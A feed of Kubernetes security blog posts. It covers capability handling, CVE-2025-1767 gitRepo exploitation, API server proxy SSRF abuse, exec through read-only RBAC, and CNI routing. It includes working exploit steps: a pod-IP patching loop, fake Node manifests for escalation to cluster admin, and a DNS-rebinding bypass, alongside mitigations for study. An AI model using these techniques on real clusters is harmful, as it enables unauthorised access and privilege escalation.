and there’s another <a href="https://github.com/kubernetes/kubernetes/issues/119568">issue from 2023</a> on it as well.</p> <p>From that, one thing that caught my eye was that apparently CRI-O handles this differently from containerd, which I thought was interesting.</p> <h2 id="comparing-cri-o---with-iximiuz-labs">Comparing CRI-O - with iximiuz labs</h2> <p>I wanted to test out this difference in behaviour, but unfortunately I don’t have a CRI-O backed cluster available in my test lab.
Fortunately, iximiuz labs has an awesome <a href="https://labs.iximiuz.com/playgrounds/k8s-omni">Kubernetes playground</a> where you can specify various combinations of CRI and CNI to test out different scenarios, which is nice!</p> <p>Testing out a cluster there with CRI-O confirmed that things are handled rather differently.</p> <ul> <li>Adding <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> worked and the capability was added.</li> <li>Adding <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> worked and the capability was added.</li> <li>setting <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> and adding <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> was blocked</li> <li>setting <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> and adding <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> was allowed and the capability was added.</li> <li>setting an invalid capability resulted in an error on container creation (CRI-O prepended the capability set with <code class="language-plaintext highlighter-rouge">CAP_</code> and then threw an error stopping pod creation as it was invalid).</li> </ul> <p>So we can see that CRI-O handles things a bit differently, allowing both <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> and <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> to work and erroring out on invalid capabilities!</p> <h2 id="conclusion">Conclusion</h2> <p>Sometimes we can assume that Kubernetes clusters will work the same way, so we can freely move workloads from one to another, regardless of distribution. This case provides an illustration of one way that that assumption might not hold up, and we can see some surprising results!</p> Wed, 23 Apr 2025 11:00:00 +0100 https://raesene.github.io/blog/2025/04/23/cap-or-no-cap/ https://raesene.github.io/blog/2025/04/23/cap-or-no-cap/ CVE-2025-1767 - Another gitrepo issue <p>There’s a new Kubernetes security vulnerability that’s just been disclosed and I thought it was worth taking a look at it, as there’s a couple of interesting aspects to it. <a href="https://github.com/kubernetes/kubernetes/issues/130786">CVE-2025-1767</a> exists in the <code class="language-plaintext highlighter-rouge">gitRepo</code> volume type and can allow users who can create pods with <code class="language-plaintext highlighter-rouge">gitRepo</code> volumes to get access to any other git repository on the node where the pod is deployed. This is the second recent CVE related to <code class="language-plaintext highlighter-rouge">gitRepo</code> volumes, I covered the last one <a href="https://raesene.github.io/blog/2024/07/10/Fun-With-GitRepo-Volumes/">here</a></p> <h2 id="vulnerability-and-exploitation">Vulnerability and Exploitation</h2> <p>So setting this up is relatively straightforward. Our node OS has to have <code class="language-plaintext highlighter-rouge">git</code> installed, which is common but not the case in every distribution, and we need to be able to create pods on that node. 
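One quick (if rough) way to check the first of those is to look for the binary from a node debug pod, something like the command below (the node name is just an example and the path could differ between distributions).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># check whether git is present on the node's filesystem (mounted at /host in the debug pod)
kubectl debug node/kind-control-plane -it --image=busybox -- ls /host/usr/bin/git
</code></pre></div></div> <p>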
With those two pre-requisites in place, we can show how to exploit it.</p> <p>I’m going to use a <a href="https://kind.sigs.k8s.io/">kind cluster</a> , so first step is to shell into the cluster and install git, as it’s not included with kind.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kind create cluster </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker exec -it kind-control-plane bash </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apt update &amp;&amp; apt install -y git </code></pre></div></div> <p>Next we need a “victim” git repository, for this I’ll just clone down <a href="https://github.com/raesene/TestingScripts/">one of my repositories</a> into the root of the node’s filesystem.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/raesene/TestingScripts/ </code></pre></div></div> <p>With that setup done, exit the node shell, and then we can create our “exploit” pod. This is pretty straightforward, all we need is a pod with a <code class="language-plaintext highlighter-rouge">gitRepo</code> volume and we specify the repository to pull into the pod using a file path. As the plugin is just running git on the host, it can access that directory just fine and pull it into the pod.</p> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Pod</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">git-repo-pod-test</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">containers</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">git-repo-test-container</span> <span class="na">image</span><span class="pi">:</span> <span class="s">raesene/alpine-containertools</span> <span class="na">volumeMounts</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">git-volume</span> <span class="na">mountPath</span><span class="pi">:</span> <span class="s">/tmp</span> <span class="na">volumes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">git-volume</span> <span class="na">gitRepo</span><span class="pi">:</span> <span class="na">repository</span><span class="pi">:</span> <span class="s2">"</span><span class="s">/TestingScripts"</span> <span class="na">directory</span><span class="pi">:</span> <span class="s2">"</span><span class="s">."</span> </code></pre></div></div> <p>We can then save this as <code class="language-plaintext highlighter-rouge">gitrepotest.yaml</code> and apply it to the cluster with</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl create -f gitrepotest.yaml </code></pre></div></div> <p>If all works ok, it should be possible to check that the repository has been cloned from the node into the pod</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre 
class="highlight"><code>kubectl exec git-repo-pod-test -- ls /tmp </code></pre></div></div> <p>This will show the files from the cloned repository!</p> <h2 id="impact--exploitability">Impact &amp; Exploitability</h2> <p>So that’s how it works, but is it really a problem? My feeling is that this is quite a situational vulnerability. Essentially the attacker needs to know the path to a git repository on the node, and for it to contain files that they should not have access to. That’s not going to be every cluster for sure, but there are times when you could see this causing problems.</p> <h2 id="patching--mitigation">Patching &amp; Mitigation</h2> <p>The patching situation for this vulnerability is interesting. The CVE description says that a patch will not be provided as <code class="language-plaintext highlighter-rouge">gitRepo</code> volumes are deprecated, which is true. However, this volume type is enabled by Kubernetes by default and there is no flag or switch that would allow a cluster operator to disable it.</p> <p>There has been an <a href="https://github.com/kubernetes/kubernetes/issues/125983">ongoing discussion</a> on disabling and/or removing this volume type since the <a href="https://github.com/kubernetes/kubernetes/issues/128885">last CVE</a> affecting this component, but a decision hasn’t currently been made on its removal.</p> <p>In practice, if you don’t use <code class="language-plaintext highlighter-rouge">gitRepo</code> volumes, you can mitigate this in a couple of ways. If you don’t need <code class="language-plaintext highlighter-rouge">git</code> on your nodes you can just remove it there (assuming un-managed Kubernetes of course), and you can also block the use of these volumes using <a href="https://kubernetes.io/docs/reference/access-authn-authz/validating-admission-policy/">Validating Admission Policy</a> or similar admission controllers. There’s some details in the CVE announcement of a policy that could be used.</p> <p>One downside that you may encounter here is that I’d imagine CVE scanners will pick up this vulnerability, and as they can’t easily detect the mitigations, and there are no patches available and all Kubernetes versions are affected, I’d expect this to flag a lot of Kubernetes installations as vulnerable.</p> <h2 id="conclusion">Conclusion</h2> <p>Whilst this is a bit of a situational vulnerability, it’s an interesting illustration of how some less well known components of Kubernetes can affect its security.</p> Fri, 14 Mar 2025 10:00:00 +0000 https://raesene.github.io/blog/2025/03/14/cve-2025-1767-another-gitrepo-issue/ https://raesene.github.io/blog/2025/03/14/cve-2025-1767-another-gitrepo-issue/ Exploring the Kubernetes API Server Proxy <p>For my first post of the year I thought it’d be interesting to look at a lesser known feature of the Kubernetes API server which has some interesting security implications.</p> <p>The Kubernetes API server can act as an HTTP proxy server, allowing users with the right access to get to applications they might otherwise not be able to reach. This is one of a number of proxies in the Kubernetes world (detailed <a href="https://kubernetes.io/docs/concepts/cluster-administration/proxies/">here</a>) which serve different purposes. The proxy can be used to access pods, services, and nodes in the cluster; we’ll focus on pods and nodes for this post.</p> <h2 id="how-does-it-work">How does it work?</h2> <p>Let’s demonstrate how this works with a <a href="https://kind.sigs.k8s.io/">KinD</a> cluster and some pods.
With a standard kind cluster spun up using <code class="language-plaintext highlighter-rouge">kind create cluster</code> we can start an echo server so it’ll show us what we’re sending</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl run echoserver <span class="nt">--image</span> gcr.io/google_containers/echoserver:1.10 </code></pre></div></div> <p>Next (just to make things a bit more complex) we’ll start the <a href="https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/#directly-accessing-the-rest-api">kubectl proxy</a> on our client to let us send curl requests to the API server more easily</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl proxy </code></pre></div></div> <p>With that all in place we can use a <code class="language-plaintext highlighter-rouge">curl</code> request from our client to access the echoserver pod via the API server proxy</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/namespaces/default/pods/echoserver:8080/proxy/ </code></pre></div></div> <p>And you should get a response that looks a bit like this</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Request Information: client_address=10.244.0.1 method=GET real path=/ query= request_version=1.1 request_scheme=http request_uri=http://127.0.0.1:8080/ Request Headers: accept=*/* accept-encoding=gzip host=127.0.0.1:45745 user-agent=curl/8.5.0 x-forwarded-for=127.0.0.1, 172.18.0.1 x-forwarded-uri=/api/v1/namespaces/default/pods/echoserver:8080/proxy/ </code></pre></div></div> <p>Looking at the response from the echo server we can see some interesting items. The <code class="language-plaintext highlighter-rouge">client_address</code> is the API servers address on the pod network, and we can also see the <code class="language-plaintext highlighter-rouge">x-forwarded-for</code> and <code class="language-plaintext highlighter-rouge">x-forwarded-uri</code> headers are set too.</p> <p>Graphically the set of connections look a bit like this</p> <p><img src="https://raesene.github.io/assets/media/kube-api-proxy.png" alt="API Server Proxy" /></p> <p>In terms of how this feature works, one interesting point to note here is that it’s possible to specify the port that we’re using, so the API server proxy can be used to get to any port.</p> <p>We can also put in anything that works in a curl request and it will be relayed onwards to the proxy targets, so POST requests, headers with tokens or anything else that’s valid in curl, which makes this pretty powerful.</p> <p>It’s not just pods that we can proxy to, we can also get to any service running on a node (with an exception we’ll mention in a bit). 
So for example with our kind cluster setup, we can issue a curl command like</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/nodes/http:kind-control-plane:10256/proxy/healthz </code></pre></div></div> <p>and we get back the kube-proxy’s healthz endpoint information</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="nl">"lastUpdated"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2025-01-18 07:58:53.413049689 +0000 UTC m=+930.365308647"</span><span class="p">,</span><span class="nl">"currentTime"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2025-01-18 07:58:53.413049689 +0000 UTC m=+930.365308647"</span><span class="p">,</span><span class="w"> </span><span class="nl">"nodeEligible"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <h2 id="security-controls">Security Controls</h2> <p>Obviously this is a fairly powerful feature and not something you’d want to give to just anyone, so what rights do you need and what restrictions are there on its use?</p> <p>The user making use of the proxy requires rights to the <code class="language-plaintext highlighter-rouge">proxy</code> sub-resource of <code class="language-plaintext highlighter-rouge">pods</code> or <code class="language-plaintext highlighter-rouge">nodes</code> (N.B. Providing <code class="language-plaintext highlighter-rouge">node/proxy</code> rights also allows use of the Kubelet API’s more dangerous features).</p> <p>Additionally there is a check in the API server source code which looks to stop users of this feature from reaching localhost or link-local (e.g. <code class="language-plaintext highlighter-rouge">169.254.169.254</code>) addresses. The function <a href="https://github.com/kubernetes/kubernetes/blob/master/pkg/registry/core/node/strategy.go#L272"><code class="language-plaintext highlighter-rouge">isProxyableHost</code></a> uses the golang function <code class="language-plaintext highlighter-rouge">IsGlobalUnicast</code> to check if it’s ok to proxy the requests.</p> <h2 id="bypasses-and-limitations">Bypasses and limitations</h2> <p>Now we’ve described a bit about how this feature is used and secured, let’s get on to the fun part: how can it be (mis)used :)</p> <p>Obviously a server feature that lets us proxy requests is effectively SSRF by design, so it seems likely that there are some interesting ways we can use it.</p> <h3 id="proxying-to-addresses-outside-the-cluster">Proxying to addresses outside the cluster</h3> <p>One thing that might be handy if you’re a pentester or perhaps CTF player is being able to use the API server’s network position to get access to other hosts on restricted networks. To do that we’d need to be able to tell the API server proxy to direct traffic to arbitrary IP addresses rather than just pods and nodes inside the cluster.</p> <p>For this we’ll go to a Kinvolk <a href="https://kinvolk.io/blog/2019/02/abusing-kubernetes-apiserver-proxying">blog post from 2019</a>, as this technique works fine in 2025!</p> <p>Essentially, if you own a pod resource you can overwrite the IP address that it has in its status and then proxy to that IP address.
It’s a little tricky as the Kubernetes cluster will spot this change as a mistake and will change it back to the valid IP address, so you have to loop the requests to keep it set to the value you want.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span> <span class="nb">set</span> <span class="nt">-euo</span> pipefail <span class="nb">readonly </span><span class="nv">PORT</span><span class="o">=</span>8001 <span class="nb">readonly </span><span class="nv">POD</span><span class="o">=</span>echoserver <span class="nb">readonly </span><span class="nv">TARGETIP</span><span class="o">=</span>1.1.1.1 <span class="k">while </span><span class="nb">true</span><span class="p">;</span> <span class="k">do </span>curl <span class="nt">-v</span> <span class="nt">-H</span> <span class="s1">'Content-Type: application/json'</span> <span class="se">\</span> <span class="s2">"http://localhost:</span><span class="k">${</span><span class="nv">PORT</span><span class="k">}</span><span class="s2">/api/v1/namespaces/default/pods/</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">/status"</span> <span class="o">&gt;</span><span class="s2">"</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">-orig.json"</span> <span class="nb">cat</span> <span class="nv">$POD</span><span class="nt">-orig</span>.json | <span class="nb">sed</span> <span class="s1">'s/"podIP": ".*",/"podIP": "'</span><span class="k">${</span><span class="nv">TARGETIP</span><span class="k">}</span><span class="s1">'",/g'</span> <span class="se">\</span> <span class="o">&gt;</span><span class="s2">"</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">-patched.json"</span> curl <span class="nt">-v</span> <span class="nt">-H</span> <span class="s1">'Content-Type:application/merge-patch+json'</span> <span class="se">\</span> <span class="nt">-X</span> PATCH <span class="nt">-d</span> <span class="s2">"@</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">-patched.json"</span> <span class="se">\</span> <span class="s2">"http://localhost:</span><span class="k">${</span><span class="nv">PORT</span><span class="k">}</span><span class="s2">/api/v1/namespaces/default/pods/</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">/status"</span> <span class="nb">rm</span> <span class="nt">-f</span> <span class="s2">"</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">-orig.json"</span> <span class="s2">"</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">-patched.json"</span> <span class="k">done</span> </code></pre></div></div> <p>With this script looping, you can make a request like</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/namespaces/default/pods/echoserver/proxy/ </code></pre></div></div> <p>and you’ll get the response from the Target IP (in this case 1.1.1.1)</p> <h3 id="fake-node-objects">Fake Node objects</h3> <p>Another route to achieving this goal can be to create fake node objects in the cluster (assuming you’ve got the rights to do that). 
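A quick way to check whether the credentials you’re holding allow that is kubectl’s built-in access review, for example:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># can we create node objects, and use the proxy sub-resource on nodes?
kubectl auth can-i create nodes
kubectl auth can-i get nodes --subresource=proxy
</code></pre></div></div> <p>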
<p>How well this one works depends a bit on the distribution as some will quickly clean up any fake nodes that are created, but it works fine in vanilla Kubernetes.</p>

<p>What’s handy here is that we can use hostnames instead of just IP addresses, so a node object like this</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kind: Node
apiVersion: v1
metadata:
  name: fakegoogle
status:
  addresses:
  - address: www.google.com
    type: Hostname
</code></pre></div></div>

<p>will then allow us to issue a curl request like</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/nodes/http:fakegoogle:80/proxy/
</code></pre></div></div>

<p>and get a response from <code class="language-plaintext highlighter-rouge">www.google.com</code>.</p>

<h3 id="getting-the-api-server-to-authenticate-to-itself">Getting the API Server to authenticate to itself</h3>

<p>An interesting variation on this idea was noted in the Kubernetes 1.24 Security audit and is currently still an <a href="https://github.com/kubernetes/kubernetes/issues/119270">open issue</a>, so it remains exploitable. This builds on the idea of a fake node by adding additional information to say that the kubelet port on this node is the same as the API server’s port.
This causes the API server to authenticate to itself and allows someone with create node and node proxy rights to escalate to full cluster admin.</p>

<p>A YAML manifest like this</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kind: Node
apiVersion: v1
metadata:
  name: kindserver
status:
  addresses:
  - address: 172.20.0.3
    type: ExternalIP
  daemonEndpoints:
    kubeletEndpoint:
      Port: 6443
</code></pre></div></div>

<p>can be applied, and then curl commands like the one below will get access to the API server</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/nodes/https:kindserver:6443/proxy/
</code></pre></div></div>

<h3 id="cve-2020-8562---bypassing-the-blocklist">CVE-2020-8562 - Bypassing the blocklist</h3>

<p>Another point to note about the API server proxy is that it might be possible to bypass the blocklist that’s in place via a known, but unpatchable, CVE (there’s a great blog with details on the original CVE from the reporter <a href="https://business.blogthinkbig.com/kubernetes-vulnerability-discovered-allows-access-restricted-networks-cve-2020-8562/">here</a>).</p>

<p>There is a TOCTOU vulnerability in the API server’s blocklist checking that means, if you can make requests to an address you control via the API server proxy, you might be able to get the request to go to IP addresses like localhost or the cloud metadata service addresses like <code class="language-plaintext highlighter-rouge">169.254.169.254</code>.</p>

<p><img src="https://raesene.github.io/assets/media/CVE-2020-8562.png" alt="CVE-2020-8562" /></p>

<p>Exploiting this one takes a couple of steps.
Firstly we can use a fake node object, as described in the previous section, and then we’ll need a DNS service that alternates between resolving to different IP addresses.</p>

<p>Fortunately for us, there’s an existing service we can use for the rebinding, https://lock.cmpxchg8b.com/rebinder.html.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kind: Node
apiVersion: v1
metadata:
  name: rebinder
status:
  addresses:
  - address: 2d21209c.7f000001.rbndr.us
    type: Hostname
</code></pre></div></div>

<p>With that created we can use the URL below to try and access the configuration of the kube-proxy component, which is only listening on localhost.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/nodes/http:rebinder:10249/proxy/configz
</code></pre></div></div>

<p>As this is a TOCTOU it can take quite a few attempts to get a response. You should see three possibilities: firstly a <code class="language-plaintext highlighter-rouge">400</code> response, which happens when the blocklist check fails; secondly a <code class="language-plaintext highlighter-rouge">503</code> response, where the request goes to the external address (in this case the IP address for <code class="language-plaintext highlighter-rouge">scanme.nmap.org</code>) and doesn’t get a response on that URL; and lastly, when the TOCTOU is successful, you’ll get the response back from the kube-proxy service.</p>
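<p>Since this is just a race, the simplest approach is to retry until you get something other than the two failure cases. A quick loop along these lines (a sketch, reusing the fake node name and port from the example above) does the job:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Keep requesting the proxied configz endpoint until the TOCTOU race is won,
# i.e. until we see something other than the 400 blocklist rejection or the
# 503 from the external address.
while true; do
  code=$(curl -s -o /tmp/rebinder-out -w '%{http_code}' \
    "http://127.0.0.1:8001/api/v1/nodes/http:rebinder:10249/proxy/configz")
  if [ "${code}" != "400" ] &amp;&amp; [ "${code}" != "503" ]; then
    cat /tmp/rebinder-out
    break
  fi
done
</code></pre></div></div>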
<p>I’ve generally found that fewer than 30 requests are needed for a “hit” using this technique.</p>

<p>One place where this particular technique is interesting is obviously cloud hosted Kubernetes clusters, and in particular managed providers, who probably don’t want cluster operators requesting localhost interfaces on machines they control :)</p>

<p>To mitigate this, many of the providers I’ve looked at use <a href="https://kubernetes.io/docs/tasks/extend-kubernetes/setup-konnectivity/">Konnectivity</a>, which is <em>yet another</em> proxy and can be configured to ensure that any requests that come in from user controlled addresses are routed back to the node network and away from the control plane network.</p>

<h2 id="conclusion">Conclusion</h2>

<p>The Kubernetes API server proxy is a handy feature for a number of reasons, but obviously making any service a proxy is a tricky proposition from a security standpoint.</p>

<p>If you’re a cluster operator it’s important to be very careful about who you provide proxy rights to, and if you’re considering creating a managed Kubernetes service where you don’t want cluster owners to have access to the control plane, you’re going to need to be very careful with network firewalling and with ensuring that the proxy doesn’t let them get to areas that should be restricted!</p>

Sat, 18 Jan 2025 10:00:00 +0000 https://raesene.github.io/blog/2025/01/18/Exploring-the-Kubernetes-API-Server-Proxy/ https://raesene.github.io/blog/2025/01/18/Exploring-the-Kubernetes-API-Server-Proxy/ When is read-only not read-only?

<p>Bit of a digression from the network series today, to discuss something I just saw in passing, which is an interesting example of a possible sharp corner/foot gun in Kubernetes RBAC.</p>

<p>Generally speaking, for REST style APIs <code class="language-plaintext highlighter-rouge">GET</code> requests are read-only, so they shouldn’t change the state of resources or execute commands.
As such you might think that giving a user the following rights in Kubernetes would essentially just be giving them read-only access to pod information in the default namespace.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-reader
  namespace: default
rules:
- apiGroups: [""]
  resources:
  - "pods"
  - "pods/log"
  - "pods/status"
  - "pods/exec"
  - "pods/attach"
  - "pods/portforward"
  verbs: ["get", "list", "watch"]
</code></pre></div></div>

<p>However, due to the details of how WebSockets work with Kubernetes, this access <em>can</em> allow users to run <code class="language-plaintext highlighter-rouge">kubectl exec</code> commands in pods and get command execution rights in that namespace! There’s information on the origins of this in <a href="https://github.com/kubernetes/kubernetes/issues/78741">this GitHub issue</a> but it’s essentially down to how WebSockets work.</p>

<p>What’s possibly more interesting is that, while this behaviour has been in place for a while, you might not have noticed it, as until Kubernetes version 1.31 the default was to use <a href="https://en.wikipedia.org/wiki/SPDY">SPDY</a> for <code class="language-plaintext highlighter-rouge">exec</code> commands instead of WebSockets.</p>
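<p>A quick way to see the distinction the RBAC layer is drawing here is to check the verbs on the sub-resource directly. A sketch (assuming your kubectl has the <code class="language-plaintext highlighter-rouge">--subresource</code> flag, and using the same <code class="language-plaintext highlighter-rouge">bob.config</code> kubeconfig as the example below):</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code># With the Role above, "create" on pods/exec should be denied...
kubectl --kubeconfig bob.config auth can-i create pods --subresource=exec -n default
# ...while "get" on pods/exec is allowed, which is all a WebSocket-based exec needs.
kubectl --kubeconfig bob.config auth can-i get pods --subresource=exec -n default
</code></pre></div></div>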
<p>So if a user with <code class="language-plaintext highlighter-rouge">GET</code> rights on <code class="language-plaintext highlighter-rouge">pods/exec</code> tried to use <code class="language-plaintext highlighter-rouge">kubectl exec</code> in 1.29, they’d get an error like this</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Error from server (Forbidden): pods "test" is forbidden: User "bob" cannot create resource "pods/exec" in API group "" in the namespace "default"
</code></pre></div></div>

<p>but if a user with the exact same rights tried the same command in Kubernetes 1.31, it works!</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl --kubeconfig bob.config exec -it test -- /bin/bash
bash-5.1# exit
exit
</code></pre></div></div>

<p>It’s worth noting that, whilst it’s easier to do now, using WebSockets with these rights has been possible for a long time using tools like <a href="https://github.com/jpts/kubectl-execws">kubectl-execws</a> from <a href="https://hachyderm.io/@jpts">jpts</a>.</p>

<h2 id="conclusion">Conclusion</h2>

<p>Kubernetes RBAC has some tricky areas where the behaviour you get might not be exactly what you expect, and sometimes, as in this case, those unexpected behaviours are not very apparent!</p>

Mon, 11 Nov 2024 12:00:00 +0000 https://raesene.github.io/blog/2024/11/11/When-Is-Read-Only-Not-Read-Only/ https://raesene.github.io/blog/2024/11/11/When-Is-Read-Only-Not-Read-Only/ Exploring A Basic Kubernetes Network Plugin

<p>In my <a href="https://raesene.github.io/blog/2024/11/01/The-Many-IP-Addresses-Of-Kubernetes/">last blog</a> I took a look at some of the different IP addresses that get assigned in a standard Kubernetes cluster, but an obvious follow-on question is: how do pods get those IP addresses? To answer that question we need to talk about network plugins.</p>

<p>The Kubernetes project took the decision to delegate this part of container networking to external software, in order to make it a more flexible system that can be adapted to different use cases. The way this is done is that the project leverages the <a href="https://www.cncf.io/projects/container-network-interface-cni/">CNI</a> specification, and plugins which comply with that spec can be used to provide container networking in Kubernetes clusters.</p>

<p>This means that, like many areas of Kubernetes, there’s quite a lot of possible complexity and options to consider, with over 20 different network plugins each with their own approach, so let’s start with the basics!</p>

<h2 id="exploring-a-basic-cluster-set-up">Exploring a basic cluster set-up</h2>

<p>We’ll make use of <a href="https://kind.sigs.k8s.io/">kind</a> to provide an initial demonstration cluster, which will give us their default network plugin <a href="https://github.com/kubernetes-sigs/kind/tree/main/images/kindnetd">kindnetd</a>. Kindnetd provides a simple CNI implementation which works well for standard kind clusters.
In order to demonstrate how networking works, we’ll set up a couple of worker nodes using this config file</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
- role: worker
- role: worker
</code></pre></div></div>

<p>Then, with that file saved as <code class="language-plaintext highlighter-rouge">kindnet-multi-node.yaml</code> we can start our test cluster with <code class="language-plaintext highlighter-rouge">kind create cluster --name=kindnet-multi-node --config=kindnet-multi-node.yaml</code>. Once the cluster’s up and running we can take a look at the networking.</p>

<p>One of the first questions we might have is “how are Kubernetes network plugins configured?”. The answer is that any CNI plugins in use have a configuration file in a nominated directory, which is <code class="language-plaintext highlighter-rouge">/etc/cni/net.d</code> by default. If we look at that directory on our kind nodes we’ll see a file called <code class="language-plaintext highlighter-rouge">10-kindnet.conflist</code> which contains the configuration for the network plugin. Looking at the files in this directory is actually the most reliable way to determine which network plugin(s) are in use, as there’s no direct record of it at a Kubernetes level.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
  "cniVersion": "0.3.1",
  "name": "kindnet",
  "plugins": [
    {
      "type": "ptp",
      "ipMasq": false,
      "ipam": {
        "type": "host-local",
        "dataDir": "/run/cni-ipam-state",
        "routes": [
          { "dst": "0.0.0.0/0" }
        ],
        "ranges": [
          [ { "subnet": "10.244.2.0/24" } ]
        ]
      },
      "mtu": 1500
    },
    {
      "type": "portmap",
      "capabilities": { "portMappings": true }
    }
  ]
}
</code></pre></div></div>

<p>From this configuration file we can see a bit of how the network plugin works. Firstly we see the <code class="language-plaintext highlighter-rouge">ptp</code> plugin is used. This plugin is actually one of the default ones that the CNI project maintains. What it does is create a <code class="language-plaintext highlighter-rouge">veth</code> network interface for each container, which can then be given an IP address. We can also see an <code class="language-plaintext highlighter-rouge">ipam</code> section which deals with how containers are allocated IP addresses. In this case we can see that a range of <code class="language-plaintext highlighter-rouge">10.244.2.0/24</code> is assigned to this node, and if we look at the other worker node in the cluster we see it has the <code class="language-plaintext highlighter-rouge">10.244.1.0/24</code> range, and the control plane node has <code class="language-plaintext highlighter-rouge">10.244.0.0/24</code>.</p>

<p>So the next question might be “how does the traffic from a pod on one node get to a pod on another node?”. This will vary depending on the network plugin you’re using but in the case of <code class="language-plaintext highlighter-rouge">kindnet</code> it’s pretty simple. Essentially each node has the entries for the other nodes in its routing table.
We can see that by running <code class="language-plaintext highlighter-rouge">ip route</code> on one of our nodes.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>default via 172.18.0.1 dev eth0
10.244.0.0/24 via 172.18.0.3 dev eth0
10.244.2.0/24 via 172.18.0.2 dev eth0
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4
</code></pre></div></div>

<p>In this output we can see that the other nodes in the cluster have IP addresses of <code class="language-plaintext highlighter-rouge">172.18.0.3</code> and <code class="language-plaintext highlighter-rouge">172.18.0.2</code> respectively, and the container subnets are routed to those nodes.</p>

<p>We can also see how traffic gets to individual pods on that node. First let’s create a deployment with 4 replicas using <code class="language-plaintext highlighter-rouge">kubectl create deployment webserver --image=nginx --replicas=4</code>. Once we’ve got that set up, we can run the <code class="language-plaintext highlighter-rouge">ip route</code> command again to see what effect that has had.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>default via 172.18.0.1 dev eth0
10.244.0.0/24 via 172.18.0.2 dev eth0
10.244.1.2 dev vethc2e31815 scope host
10.244.1.3 dev veth2621a4f6 scope host
10.244.2.0/24 via 172.18.0.3 dev eth0
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4
</code></pre></div></div>

<p>We can see two new entries in our routing table for the two containers that got started on this worker node, showing how traffic would be sent to the container once it reaches the node.</p>

<h2 id="conclusion">Conclusion</h2>

